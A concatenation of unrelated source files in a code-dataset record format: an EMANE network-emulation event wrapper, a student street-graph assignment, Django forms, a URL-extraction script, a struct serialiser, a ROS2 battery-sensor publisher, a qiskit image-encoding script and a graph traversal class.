import Wrapper\n\ntry:\n    from emane.events import EventService, LocationEvent, PathlossEvent, AntennaProfileEvent\nexcept:\n    from emanesh.events import EventService, LocationEvent, PathlossEvent, AntennaProfileEvent\n\n\n\nclass POV(object):\n    def __init__(self):\n        self._position = None\n        self._orientation = None\n        self._velocity = None\n        self._dirty = False\n\n    @property\n    def position(self):\n        return self._position\n\n    @position.setter\n    def position(self, lat, lon, alt):\n        self._position = (lat, lon, alt)\n        self._dirty = True\n\n    @property\n    def orientation(self):\n        return self._orientation\n\n    @orientation.setter\n    def orientation(self, pitch, roll, yaw):\n        self._orientation = (pitch, roll, yaw)\n        self._dirty = True\n\n    @property\n    def velocity(self):\n        return self._velocity\n\n    @velocity.setter\n    def velocity(self, azimuth, elevation, speed):\n        self._velocity = (azimuth, elevation, speed)\n        self._dirty = True\n\n    @property\n    def dirty(self):\n        return self._dirty\n\n    def read_reset(self):\n        self._dirty = False\n        return (self._position, self._orientation, self._velocity)\n\n\n\nclass EmanePhyInit(Wrapper):\n    \"\"\"\n    Send EMANE PHY Layer Events to set initial network conditions.\n\n    This wrapper takes an EEL file as input. It currently recognizes these sentences:\n\n    1. EMANE pathloss sentences of format:\n\n       TIME nem:ID pathloss [nem:ID,PATHLOSS]+\n\n       example:\n          Set bidirectional pathloss between nem 1 and nems 2-7 to 90 and\n          nem 1 and nem 8 to 200:\n\n          -Inf nem:1 pathloss nem:2,90 nem:3,90 nem:4,90 nem:5,90 nem:6,90 nem:7,90 nem:8,200\n\n\n    2. EMANE location event sentences with latitude, longitude and altitude only:\n\n       TIME nem:ID location gps LATITUDE,LONGITUDE,ALTITUDE\n\n       LATITUDE and LONGITUDE units are degrees. ALTITUDE unit is meters.\n\n       example:\n          Set nem 3 location to 40.025495,-74.315441,3.0:\n\n          -Inf nem:3 location gps 40.025495,-74.315441,3.0\n\n\n    3. EMANE orientation event sentences with pitch, roll and yaw.\n       Note orientation sentences must be specified with (and after)\n       an associated location sentence.\n\n       TIME nem:ID orientation PITCH,ROLL,YAW\n\n       PITCH,ROLL,YAW units are degrees.\n\n       example:\n          Set nem 3 pitch, roll and yaw to 3.0,4.0,5.0\n\n          -Inf nem:3 orientation 3.0,4.0,5.0\n\n\n    4. EMANE velocity event sentences with azimuth, elevation and magnitude.\n       Note velocity sentences must be specified with (and after)\n       an associated location sentence.\n\n       TIME nem:ID velocity AZIMUTH,ELEVATION,MAGNITUDE\n\n       AZIMUTH and ELEVATION units are degrees. Magnitude unit is meters/second.\n\n       example:\n          -Inf nem:3 velocity 30.0,20.0,200.0\n\n\n    5. EMANE fadingselection event (emane >= 1.2.1) of format:\n\n       TIME nem:ID fadingselection nem:ID,none|nakagami [nem:ID,none|nakagami]*\n\n       example:\n          Send fading selection event to nem 4 selecting none for nem 1 and\n          nakagami for nems 2 and 3:\n\n          -Inf nem:4 fadingselection nem:1,none nem:2,nakagami nem:3,nakagami\n\n\n    6. An allinformedpathloss sentence of format:\n\n       TIME nem:ID[(,|-)ID]* allinformedpathloss PATHLOSS\n\n       PATHLOSS unit is dB.\n\n       example:\n          Set forward and reverse pathloss between all pairs of nems 1, 2, 3 and 7 to 90:\n\n          -Inf nem:1-3,7 allinformedpathloss 90\n\n    7. EMANE antennaprofile event of format:\n\n       TIME nem:ID antennaprofile PROFILEID,AZIMUTH,ELEVATION\n\n       AZIMUTH and ELEVATION units are degrees.\n\n       example:\n          Set nem 4 antenna profile to 3 with azimuth 195 and elevation 45:\n\n          4.0 nem:4 antennaprofile 3,195,45\n\n\n    As shown in all of the examples, the wrapper accepts negative time values and,\n    especially, a time value of -Inf (negative infinity) which means send the event\n    immediately. All finite event times are offset from the test start time.\n\n    \"\"\"\n\n    def register(self, registrar):\n        registrar.register_infile_name('emanephyinit.eel')\n\n        registrar.register_outfile_name('emanephyinit.log')\n\n        registrar.register_argument('eventservicegroup',\n                                    '224.1.2.8:45703',\n                                    'The Event Service multicast group and port.')\n\n        registrar.register_argument('eventservicedevice',\n                                    None,\n                                    'Event channel multicast device.')\n\n\n    def run(self, ctx):\n        if not ctx.args.infile:\n            return\n\n        # position, orientation and velocities are specified as separate\n        # EEL sentences - however orientation and velocity events must\n        # be specified with their associated location triplets.\n        # Store the most recently specified location for each nem and\n        # reuse it as optional orientation and velocity sentences are\n        # parsed.\n        self._location_cache = {}\n\n        handlers = {\n            'allinformedpathloss':self.allinformed_pathloss,\n            'location':self.location_gps,\n            'orientation':self.orientation,\n            'velocity':self.velocity,\n            'pathloss':self.pathloss,\n            'fadingselection':self.fadingselection,\n            'antennaprofile':self.antennaprofile\n        }\n\n        if not ctx.args.eventservicedevice:\n            message = 'Wrapper emane.emanephyinit mandatory argument \"eventservicedevice\" ' \\\n                      'not specified. Quitting.'\n            raise RuntimeError(message)\n\n        mcgroup,port = ctx.args.eventservicegroup.split(':')\n\n        sequencer = EELSequencer(ctx.args.infile,\n                                 ctx.args.starttime,\n                                 list(handlers.keys()))\n\n        service = EventService((mcgroup, int(port), ctx.args.eventservicedevice))\n\n        with open(ctx.args.outfile, 'w+') as lfd:\n            print('process infile \"%s\"' % ctx.args.infile)\n\n            for eventtime,moduleid,eventtype,eventargs in sequencer.init_events:\n                events = handlers[eventtype](moduleid, eventtype, eventargs)\n\n                for nem,event in list(events.items()):\n                    service.publish(nem, event)\n\n                logline = 'process eventtype \"%s\" to nems {%s}' % \\\n                          (eventtype, ','.join(map(str, sorted(events.keys()))))\n\n                self.log(lfd, logline)\n\n        # return if there are no non-initialization events\n        if not sequencer.has_dynamic_events:\n            return\n\n        # otherwise daemonize and carry on\n        print('daemonize for dynamic events')\n        if daemonize() > 0:\n            return\n\n        # reopen after daemonize\n        service2 = EventService((mcgroup, int(port), ctx.args.eventservicedevice))\n\n        # and log\n        with open(ctx.args.outfile, 'a') as lfd:\n            try:\n                for eventlist in sequencer:\n                    for eventtime, moduleid, eventtype, eventargs in eventlist:\n                        if math.isinf(eventtime):\n                            continue\n\n                        events = handlers[eventtype](moduleid, eventtype, eventargs)\n\n                        for nem,event in list(events.items()):\n                            service2.publish(nem, event)\n\n                        logline = 'process eventtype \"%s\" to nems {%s}' % \\\n                                  (eventtype, ','.join(map(str, sorted(events.keys()))))\n\n                        self.log(lfd, logline)\n\n            except Exception as e:\n                self.log(lfd, e)\n\n        # exit from daemonized path\n        sys.exit(0)\n\n\n    def allinformed_pathloss(self, moduleid, eventtype, eventargs):\n        # -Inf nem:1-3,7 allinformedpathloss 90\n        nems = nodestr_to_nodelist(moduleid.split(':')[1])\n\n        pathloss = float(eventargs[0])\n\n        events = 
defaultdict(lambda: PathlossEvent())\n\n for x, y in itertools.product(nems, nems):\n if x == y:\n # ignore self node pathloss\n continue\n\n events[x].append(y, forward=pathloss)\n\n events[y].append(x, forward=pathloss)\n\n return events\n\n\n def location_gps(self, moduleid, eventtype, eventargs):\n # -Inf nem:45 location gps 40.025495,-74.315441,3.0\n location_nem = int(moduleid.split(':')[1])\n\n toks = eventargs[1].split(',')\n\n lat, lon, alt = list(map(float, toks[0:3]))\n\n self._location_cache[location_nem] = (lat,lon,alt)\n\n events = defaultdict(lambda: LocationEvent())\n\n # all events are sent to nemid 0 - ie, received by every nem\n events[0].append(location_nem, latitude=lat, longitude=lon, altitude=alt)\n\n return events\n\n\n def orientation(self, moduleid, eventtype, eventargs):\n # -Inf nem:45 orientation 3.0,4.0,5.0\n nem = int(moduleid.split(':')[1])\n\n if not nem in self._location_cache:\n raise ValueError('An orientation EEL sentence for nem \"%d\" '\n 'has been specified without an associated '\n 'location sentence. Quitting.'\n % nem)\n\n toks = eventargs[0].split(',')\n\n lat, lon, alt = self._location_cache[nem]\n\n pitch, roll, yaw = list(map(float, toks[0:3]))\n\n events = defaultdict(lambda: LocationEvent())\n\n events[0].append(nem,\n latitude=lat,\n longitude=lon,\n altitude=alt,\n pitch=pitch,\n roll=roll,\n yaw=yaw)\n\n return events\n\n\n def velocity(self, moduleid, eventtype, eventargs):\n # -Inf nem:45 velocity 30.0,20.0,200.0\n nem = int(moduleid.split(':')[1])\n\n if not nem in self._location_cache:\n raise ValueError('A velocity EEL sentence for nem \"%d\" '\n 'has been specified without an associated '\n 'location sentence. Quitting.'\n % nem)\n\n toks = eventargs[0].split(',')\n\n lat, lon, alt = self._location_cache[nem]\n\n azimuth, elevation, magnitude = list(map(float, toks[0:3]))\n\n events = defaultdict(lambda: LocationEvent())\n\n events[0].append(nem,\n latitude=lat,\n longitude=lon,\n altitude=alt,\n azimuth=azimuth,\n elevation=elevation,\n magnitude=magnitude)\n\n return events\n\n\n def fadingselection(self, moduleid, eventtype, eventargs):\n from emane.events import FadingSelectionEvent\n\n # -Inf nem:4 fadingselection nem:1,none nem:2,nakagami\n nem = int(moduleid.split(':')[1])\n\n events = defaultdict(lambda: FadingSelectionEvent())\n\n for eventarg in eventargs:\n m = re.match('nem:(?P\\d+),(?P\\w+)', eventarg)\n\n # all events are sent to nemid 0 - ie, received by every nem\n events[0].append(int(m.group('nem')), model=m.group('model'))\n\n return events\n\n\n def pathloss(self, moduleid, eventtype, eventargs):\n # -Inf nem:1 pathloss nem:2,90 nem:3,90 nem:4,90 nem:5,90 nem:6,90 nem:7,90 nem:8,200\n sending_nem = int(moduleid.split(':')[1])\n\n receiving_nems = {}\n\n for eventarg in eventargs:\n receiving_nem, pathloss = eventarg[eventarg.find(':')+1:].split(',')\n\n receiving_nems[int(receiving_nem)] = float(pathloss)\n\n events = defaultdict(lambda: PathlossEvent())\n\n for x, y in itertools.product([sending_nem], receiving_nems):\n if x == y:\n # ignore self node pathloss\n continue\n\n events[x].append(y, forward=receiving_nems[y])\n\n events[y].append(x, forward=receiving_nems[y])\n\n return events\n\n\n def antennaprofile(self, moduleid, eventtype, eventargs):\n # TIME nem:ID antennaprofile profileid,azimuth,elevation\n nem = int(moduleid.split(':')[1])\n\n events = defaultdict(lambda: AntennaProfileEvent())\n\n for eventarg in eventargs:\n profileid, azimuth, elevation = eventarg.split(',')\n\n 
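# --- Illustrative aside (not part of the original corpus file) ---
# A hedged sketch of the pair expansion the allinformedpathloss handler above
# performs. etce's real nodestr_to_nodelist is imported in the original file;
# the tiny expand() below only assumes its apparent "1-3,7" -> [1, 2, 3, 7]
# semantics and is not the actual etce implementation.
import itertools

def expand(nodestr):
    out = []
    for part in nodestr.split(','):
        if '-' in part:
            lo, hi = map(int, part.split('-'))
            out.extend(range(lo, hi + 1))
        else:
            out.append(int(part))
    return out

nems = expand('1-3,7')
# emit every ordered pair, skipping self-pairs, mirroring the
# itertools.product loop in allinformed_pathloss above
pairs = [(x, y) for x, y in itertools.product(nems, nems) if x != y]
print(pairs[:4])  # [(1, 2), (1, 3), (1, 7), (2, 1)]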
events[0].append(nemId=nem, profile=int(profileid), azimuth=float(azimuth), elevation=float(elevation))\n\n return events\n\n\n def log(self, lfd, log):\n lfd.write('%s: %s\\n' % (etce.timeutils.getstrtimenow(), log))\n\n lfd.flush()\n\n\n def stop(self, ctx):\n pass\n","repo_name":"adjacentlink/python-etce","sub_path":"etcewrappers/emane/emanephyinit.py","file_name":"emanephyinit.py","file_ext":"py","file_size_in_byte":13032,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"36103380787","text":"\"\"\"\n\nName: Libang Liang\nStudent ID: 20662701\nEmail: l38liang@uwaterloo.ca\nElectrical and Computer Engineering, University of Waterloo\na1ece650.py\n\n\"\"\"\nfrom __future__ import print_function\nimport sys\nimport re\n\nimport calculateGraph\n\n#a \"Libang Street\" (1,2) (3,4) (5,6)\nstreetList = {}\n# YOUR CODE GOES HERE\n\ndef main():\n ### YOUR MAIN CODE GOES HERE\n\n ### sample code to read from stdin.\n ### make sure to remove all spurious print statements as required\n ### by the assignment\n while True:\n try:\n line = raw_input()\n # if line != '\\n': # just hit enter will not check anything, prevent index out of range\n checkCommand(line)\n except EOFError:\n sys.exit()\n\n # for line in sys.stdin.readline():\n # checkCommand(line)\n # sys.exit()\n\n # print 'read a line:', line\n\n # except Exception as exp:\n # print(\"Error: \" + str(exp))\n # # return exit code 0 on successful termination\n # sys.exit(0)\n\ndef checkCommand(command):\n # remove all leading white space using .lstrip()\n # command = command.lstrip()\n\n if checkValid(command):\n if command[0] == 'a': # add a street\n addStreet(command)\n\n elif command[0] == 'c': # change a street\n changeStreet(command)\n\n elif command[0] == 'r': # remove a street\n removeStreet(command)\n\n elif command[0] == 'g': # produce output\n produceOutput()\n\n else:\n pass\n # print(\"Error: Your command is not valid, please type again\", file=sys.stderr)\n\ndef addStreet(command):\n # print(\"enter add street function\")\n streetName = re.findall('\"([^\"]*)\"', command) #list contains only one string\n lineSegment = re.findall('\\(([^)]+)',command) #list of strings\n coords = [map(int, i.split(',')) for i in lineSegment] # Convert list of string to list of coordinates\n\n # Check if input is already in the list\n if streetName[0].lower() in [key.lower() for key in streetList.keys()]: # Case insensitive\n print(\"Error: '\" + streetName[0] + \"' is already in the list! 
You can modify this street using 'c'\")\n else:\n streetList[streetName[0]] = coords #key is the street name, content is the line segment\n # print('Street successfully added!')\n\n # print('Current street list is shown below:\\n')\n\n\ndef changeStreet(command):\n\n streetName = re.findall('\"([^\"]*)\"', command) # list contains only one string\n\n existNameList = streetList.keys()\n foundStreet = False\n\n for i in range(len(existNameList)):\n if streetName[0].lower() == existNameList[i].lower():\n foundStreet = True\n lineSegment = re.findall('\\(([^)]+)', command) # list of strings\n coords = [map(int, j.split(',')) for j in lineSegment] # Convert list of string to list of coordinates\n streetList[existNameList[i]] = coords # Replace the line segment with new input\n if foundStreet == False:\n print(\"Error: 'c' specified for a street that does not exist.\")\n\n\ndef removeStreet(command):\n\n streetName = re.findall('\"([^\"]*)\"', command) # list contains only one string\n existNameList = streetList.keys()\n foundStreet = False\n\n for i in range(len(existNameList)):\n if streetName[0].lower() == existNameList[i].lower():\n foundStreet = True\n del streetList[existNameList[i]] # Delete from Dictionary\n # print(str(streetList))\n if foundStreet == False:\n print(\"Error: 'r' specified for a street that does not exist.\")\n\ndef produceOutput():\n vertexList, edgeList = calculateGraph.produceVertexOutput(streetList)\n\n # Produce vertex list string specified in assignment 1\n vertexOutputString = \"V = {\\n\"\n for i in range(len(vertexList)):\n coordX = outputDecimalFormating(vertexList[i][0])\n coordY = outputDecimalFormating(vertexList[i][1])\n vertexOutputString += \" {:<4}({},{})\\n\".format(str(i+1)+\":\",coordX,coordY)\n vertexOutputString = vertexOutputString + \"}\"\n print(vertexOutputString)\n\n # Produce edge list string specified in assignment 1\n edgeOutputString = \"E = {\\n\"\n for i in range(len(edgeList)):\n pointOne = edgeList[i][0]\n pointTwo = edgeList[i][1]\n edgeOutputString += \" <\" + str(pointOne) + \",\" + str(pointTwo) + \">\"\n if i < len(edgeList)-1:\n edgeOutputString += \",\\n\"\n else:\n edgeOutputString += \"\\n\"\n edgeOutputString = edgeOutputString + \"}\"\n print(edgeOutputString)\n\n\ndef outputDecimalFormating(x):\n return '{0:.2f}'.format(x)\n # if isinstance(x,float):\n # if x.is_integer():\n # return str(int(x))\n # else:\n # return '{0:.2f}'.format(x)\n # else:\n # return str(x)\n\ndef checkValid(command):\n\n if command == \"\":\n print(\"Error: Empty input, a: add street, c: change street, r: remove street, g: produce output\")\n return False\n #for 'a' and 'c':\n if command[0] == 'a' or command[0] == 'c':\n pattern = re.compile(\"^[ac]\\s\\s*\\\"[A-Za-z ]+\\\"\\s\\s*(\\([-]?[0-9]+,[-]?[0-9]+\\)\\s*){2,}$\")\n result = pattern.match(command)\n if result != None: # Found correct command\n return True\n else:\n print(\"Error: In 'a' or 'c', Your command is not valid, please type again\")\n return False\n\n # for 'r':\n elif command[0] == 'r':\n pattern = re.compile(\"^[r]\\s\\s*\\\"[a-zA-Z ]+\\\"\\s*$\") # ^: start of string, $: end of string\n result = pattern.match(command)\n if result != None:\n return True\n else:\n print(\"Error: In 'r', Your command is not valid, please type again\")\n return False\n\n elif command[0] == 'g':\n pattern = re.compile(\"^[g]\\s*$\")\n result = pattern.match(command)\n if result != None:\n return True\n else:\n print(\"Error: In 'g', Your command is not valid, please type again\")\n return False\n\n 
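# --- Illustrative aside (not part of the original corpus file) ---
# A quick check of the 'a'/'c' grammar enforced by checkValid above: a quoted
# street name of letters and spaces, followed by two or more "(x,y)" integer
# pairs. The sample commands below are made up for illustration.
import re
cmd_re = re.compile(r'^[ac]\s\s*"[A-Za-z ]+"\s\s*(\([-]?[0-9]+,[-]?[0-9]+\)\s*){2,}$')
print(bool(cmd_re.match('a "King Street" (1,2) (3,4)')))  # True
print(bool(cmd_re.match('a "King Street" (1,2)')))        # False: needs >= 2 points
print(bool(cmd_re.match('a "King St." (1,2) (3,4)')))     # False: '.' not in [A-Za-z ]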
else:\n print(\"Error: Your command should start with 'a', 'c', 'r' or 'g', please type again\")\n return False\n\n\n\ndef printStreetList():\n print(streetList)\n\nif __name__ == '__main__':\n main()","repo_name":"ECE-UW/assignment-1-llbllbllbllb","sub_path":"a1ece650.py","file_name":"a1ece650.py","file_ext":"py","file_size_in_byte":6256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19375443539","text":"import urllib.parse\nfrom django import forms\nfrom django.utils.safestring import mark_safe\n\n\ndef _name_with_url(bookmark):\n html = '%s' % (bookmark.dashboard_url(), bookmark.name)\n return mark_safe(html)\n\n\nclass BookmarkListForm(forms.Form):\n org_bookmarks = forms.MultipleChoiceField(\n label=\"Alerts about organisations\", widget=forms.CheckboxSelectMultiple()\n )\n search_bookmarks = forms.MultipleChoiceField(\n label=\"Alerts about searches\", widget=forms.CheckboxSelectMultiple()\n )\n ncso_concessions_bookmarks = forms.MultipleChoiceField(\n label=\"Alerts about NCSO price concessions\",\n widget=forms.CheckboxSelectMultiple(),\n )\n\n def __init__(self, *args, **kwargs):\n \"\"\"Populate choices with those passed in, and remove fields with no\n choices.\n\n \"\"\"\n org_bookmarks = kwargs.pop(\"org_bookmarks\", [])\n search_bookmarks = kwargs.pop(\"search_bookmarks\", [])\n ncso_concessions_bookmarks = kwargs.pop(\"ncso_concessions_bookmarks\", [])\n super(BookmarkListForm, self).__init__(*args, **kwargs)\n if org_bookmarks:\n self.fields[\"org_bookmarks\"].choices = [\n (x.id, _name_with_url(x)) for x in org_bookmarks\n ]\n else:\n del self.fields[\"org_bookmarks\"]\n if search_bookmarks:\n self.fields[\"search_bookmarks\"].choices = [\n (x.id, _name_with_url(x)) for x in search_bookmarks\n ]\n else:\n del self.fields[\"search_bookmarks\"]\n if ncso_concessions_bookmarks:\n self.fields[\"ncso_concessions_bookmarks\"].choices = [\n (x.id, _name_with_url(x)) for x in ncso_concessions_bookmarks\n ]\n else:\n del self.fields[\"ncso_concessions_bookmarks\"]\n\n\nclass SearchBookmarkForm(forms.Form):\n email = forms.EmailField(\n label=\"\",\n error_messages={\n \"required\": \"This can't be blank!\",\n \"invalid\": \"Please enter a valid email address\",\n },\n widget=forms.TextInput(attrs={\"placeholder\": \"Email address\", \"size\": \"35\"}),\n )\n url = forms.CharField(widget=forms.HiddenInput(), required=True)\n name = forms.CharField(widget=forms.HiddenInput(), required=True)\n\n def clean_name(self):\n name = self.cleaned_data[\"name\"]\n return urllib.parse.unquote(name)\n\n def clean_url(self):\n url = self.cleaned_data[\"url\"]\n return urllib.parse.unquote(url)\n\n\nclass OrgBookmarkForm(forms.Form):\n email = forms.EmailField(\n label=\"\",\n error_messages={\n \"required\": \"This can't be blank!\",\n \"invalid\": \"Please enter a valid email address\",\n },\n widget=forms.TextInput(attrs={\"placeholder\": \"Email address\", \"size\": \"35\"}),\n )\n pct_id = forms.CharField(widget=forms.HiddenInput(), required=False)\n practice_id = forms.CharField(widget=forms.HiddenInput(), required=False)\n pcn_id = forms.CharField(widget=forms.HiddenInput(), required=False)\n\n\nclass NCSOConcessionBookmarkForm(forms.Form):\n email = forms.EmailField(\n label=\"\",\n error_messages={\n \"required\": \"This can't be blank!\",\n \"invalid\": \"Please enter a valid email address\",\n },\n widget=forms.TextInput(attrs={\"placeholder\": \"Email address\", \"size\": \"35\"}),\n )\n pct_id = 
forms.CharField(widget=forms.HiddenInput(), required=False)\n practice_id = forms.CharField(widget=forms.HiddenInput(), required=False)\n\n\nclass FeedbackForm(forms.Form):\n\n # This incredibly crude captcha technique has proved enough in the past to\n # deter spam bots which blindly fill out any contact form they can find\n HUMAN_TEST_ANSWER = \"health\"\n\n email = forms.EmailField()\n name = forms.CharField()\n subject = forms.CharField()\n human_test = forms.CharField(\n label='Please type the word \"{}\" to show you\\'re not a robot'.format(\n HUMAN_TEST_ANSWER\n )\n )\n message = forms.CharField(widget=forms.Textarea)\n\n def clean_human_test(self):\n data = self.cleaned_data[\"human_test\"]\n if data.strip().lower() != self.HUMAN_TEST_ANSWER:\n raise forms.ValidationError(\n 'Sorry, you need to put the word \"{}\" here'.format(\n self.HUMAN_TEST_ANSWER\n )\n )\n","repo_name":"StefHill/openprescribing","sub_path":"openprescribing/frontend/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":4386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"44052403418","text":"# -*- coding: utf-8 -*-\n# @Author: Marte\n# @Date: 2019-04-13 13:57:54\n# @Last Modified by: Marte\n# @Last Modified time: 2019-04-13 14:10:57\n#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nimport os\n\nfr = open('cnblogs_php3','r',encoding='utf-8')\nfw = open('cnblogs_php4','a',encoding='utf-8')\nurls = fr.read()\nurl = ''\n# print(urls)\nwhile(urls.find('https://www.cnblogs.com') != -1):\n url = urls[urls.find('https://www.cnblogs.com'):urls.find('.html')+5]+'\\n'\n urls = urls[urls.find('.html')+5:]\n fw.write(url)\n print(url)\nfw.close()\nfr.close()\n","repo_name":"iwangchuanli/Project-experience","sub_path":"python/python-百度关键字爬虫/SEO/getURL.py","file_name":"getURL.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"21"} +{"seq_id":"11279982770","text":"from serialiser import WriteStream, Modifier, JSONStreamIO, XMLStreamIO, ModifierManager\nfrom io import StringIO\nfrom inspect import getmembers\nfrom pprint import pprint\n\n\nclass StructBuilder(type):\n \"\"\"Adds \"_fields\" member to structs, and sets values to default on construction\"\"\"\n\n def __init__(cls, name, bases, attrs):\n fields = dict(getmembers(cls, lambda x: isinstance(x, Field)))\n cls._fields = fields\n\n super().__init__(name, bases, attrs)\n\n def __call__(cls, *args, **kwargs):\n inst = cls.__new__(cls, *args, **kwargs)\n defaults = {n: f.type() for n, f in cls._fields.items()}\n inst.__dict__.update(defaults)\n cls.__init__(inst, *args, **kwargs)\n return inst\n\n\nclass Field:\n \"\"\"Named and typed Struct member\"\"\"\n\n def __init__(self, type_):\n self.type = type_\n\n\nclass Struct(metaclass=StructBuilder):\n\n def print(self):\n pprint(\"{}({})\".format(self.__class__.__name__, \", \"\n .join((\"{}={!r}\".format(k, getattr(self, k)) for k in self._fields))))\n\n\nclass StructModifierBase(Modifier):\n\n @classmethod\n def compose(cls, stream, ctx):\n struct = cls.modifies()\n\n for name in struct._fields:\n value = stream.read(name)\n setattr(struct, name, value)\n\n return struct\n\n @classmethod\n def decompose(cls, struct, stream, ctx):\n for name in struct._fields:\n value = getattr(struct, name)\n stream.write(name, value)\n\n @classmethod\n def build(cls, modifies_cls):\n cls_dict = dict(modifies=modifies_cls, name=modifies_cls.__name__)\n return 
type('{}Modifier'.format(modifies_cls.__name__), (cls,), cls_dict)\n\n\nclass SomeStruct(Struct):\n \"\"\"Struct with score, name, age fields.\"\"\"\n score = Field(float)\n name = Field(str)\n age = Field(int)\n\n\nif __name__ == '__main__':\n # Build list of modifiers for all Struct subclasses (list of the results of calling StructModifierBase.build on each struct subclass)\n modifiers = list(map(StructModifierBase.build, Struct.__subclasses__()))\n modifier_manager = ModifierManager(modifiers=modifiers)\n\n # Something to serialise\n serialisable = SomeStruct()\n serialisable.score = 99.9\n serialisable.age = 12\n serialisable.name = 'Bob'\n\n # Write to a write_stream\n write_stream = WriteStream(modifier_manager=modifier_manager)\n\n # We can do this (below) because we created a modifier that decomposes / composes this class\n write_stream.write('some_serialisable', serialisable)\n # Create stream IO with string object\n string_file = StringIO()\n stream_io_cls = JSONStreamIO\n stream_io = stream_io_cls(string_file)\n\n # Dump to file\n stream_io.dump(write_stream)\n\n # Print output data\n print(stream_io_cls.__name__, string_file.getvalue())\n\n # Reload from data file\n string_file.seek(0)\n read_stream = stream_io.load(modifier_manager=modifier_manager)\n\n # Read directly from stream\n serialisable_2 = read_stream.read('some_serialisable')\n serialisable_2.print()","repo_name":"agoose77/basic_serialisation","sub_path":"struct_example.py","file_name":"struct_example.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"158976703","text":"def display(arr,n):\n for i in range(n):\n print(arr[i],end=\" \")\n print()\ndef selection(arr,n):\n for i in range(n-1):\n min=i\n for j in range(i+1,n):\n if(arr[min]>arr[j]):\n min=j\n arr[i],arr[min]=arr[min],arr[i]\n display(arr,n)\n \ndef bubble(arr,n):\n for i in range(n-1):\n for j in range(0,n-1-i):\n if(arr[j]>arr[j+1]):\n arr[j],arr[j+1]=arr[j+1],arr[j]\n #display(arr,n)\n print(\"Done\")\n display(arr,n)\n \narr=[]\nn=int(input(\"Enter no of ele :\"))\nfor i in range(n):\n arr.append(int (input()))\nselection(arr,n)\nprint()\n#bubble(arr,n)\nif(len(arr)>=5):\n print(\"Top 5 scores of students are :\",arr[len(arr)-5:len(arr)])\n ","repo_name":"Meetagarwal1234/Fdsl_Lab_Codes","sub_path":"assign5.py","file_name":"assign5.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25346377440","text":"from PIL import Image\nfrom qiskit import QuantumCircuit, transpile, assemble, Aer\nfrom qiskit.visualization import plot_bloch_multivector\n\n# Load the PNG file\nimage = Image.open('/content/sample_data/image (2).png')\nimage_data = image.tobytes()\n\n# Convert the image data to binary\nbinary_data = ''.join(format(byte, '08b') for byte in image_data)\n\n# Create a quantum circuit\nnum_qubits = len(binary_data)\nqc = QuantumCircuit(num_qubits, num_qubits)\n\n# Encode the binary data into the quantum state\nfor i, bit in enumerate(binary_data):\n if bit == '1':\n qc.x(i)\n\n# Simulate the quantum state\nsimulator = Aer.get_backend('statevector_simulator')\njob = assemble(transpile(qc, simulator), backend=simulator)\nresult = simulator.run(job).result()\nstatevector = result.get_statevector()\n\n# Visualize the quantum 
state\nplot_bloch_multivector(statevector)\n","repo_name":"akriot/quant","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3123090483","text":"import rclpy\nfrom rclpy.node import Node\nfrom sensor_msgs.msg import BatteryState\n\n\nimport smbus\nfrom ina220 import INA220\n\n\nclass RosIna220Publisher(Node):\n\n def __init__(self):\n super().__init__('ros_ina220_publisher')\n\n bus = smbus.SMBus(1)\n self.ina220 = INA220(i2c_addr=0x41, i2c_dev=bus)\n\n self.publisher_ = self.create_publisher(BatteryState, 'ina220/data', 10)\n timer_period = 0.1 # seconds\n self.timer = self.create_timer(timer_period, self.timer_callback)\n\n def timer_callback(self):\n current_draw, bus_voltage, shunt_voltage = self.ina220.get_measurements()\n\n msg = BatteryState()\n msg.header.stamp = self.get_clock().now().to_msg()\n msg.header.frame_id = \"ros_ina220\"\n\n msg.current = current_draw\n msg.voltage = bus_voltage\n\n self.publisher_.publish(msg)\n\n\ndef main(args=None):\n rclpy.init(args=args)\n\n ros_ina220_publisher = RosIna220Publisher()\n\n rclpy.spin(ros_ina220_publisher)\n\n # Destroy the node explicitly\n # (optional - otherwise it will be done automatically\n # when the garbage collector destroys the node object)\n ros_ina220_publisher.destroy_node()\n rclpy.shutdown()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"rosblox/ros-ina220","sub_path":"ros_ina220/ros_ina220/publisher_member_function.py","file_name":"publisher_member_function.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2818388717","text":"import queue\n\nclass Edge:\n def __init__(self, p, n, c=0):\n self.previous = p\n self.next = n\n self.cost = c\n\nclass Graph:\n def __init__(self, size):\n self.num_nodes = size\n self.adjacency_list = [list() for x in range(size)]\n\n def add_edge(self, p, n, c=0):\n self.adjacency_list[p].append(Edge(p, n, c))\n self.adjacency_list[n].append(Edge(n, p, c))\n\n def __str__(self):\n string = list()\n for i, lst in enumerate(self.adjacency_list):\n string.append(f'{i}-')\n for edge in lst:\n string.append(f'->{edge.next}')\n string.append('\\n')\n return ''.join(map(str, string))\n\n def bfs_traversal(self, start):\n string = list()\n q = queue.Queue()\n visited = [False for x in range(self.num_nodes)]\n q.put((start, 1))\n while not q.empty():\n node, level = q.get()\n if not visited[node]:\n visited[node] = True\n string.append(f'->({node}, {level})')\n for edge in self.adjacency_list[node]:\n q.put((edge.next, level + 1))\n return ''.join(map(str, string))\n\n def dfs_traversal(self, start):\n string = list()\n q = queue.LifoQueue()\n visited = [False for x in range(self.num_nodes)]\n q.put((start, 1))\n while not q.empty():\n node, level = q.get()\n if not visited[node]:\n visited[node] = True\n string.append(f'->({node}, {level})')\n for edge in self.adjacency_list[node]:\n q.put((edge.next, level + 1))\n return ''.join(map(str, string))\n\n\nif __name__ == '__main__':\n num_graphs = int(input())\n for i in range(num_graphs):\n nodes, edges = 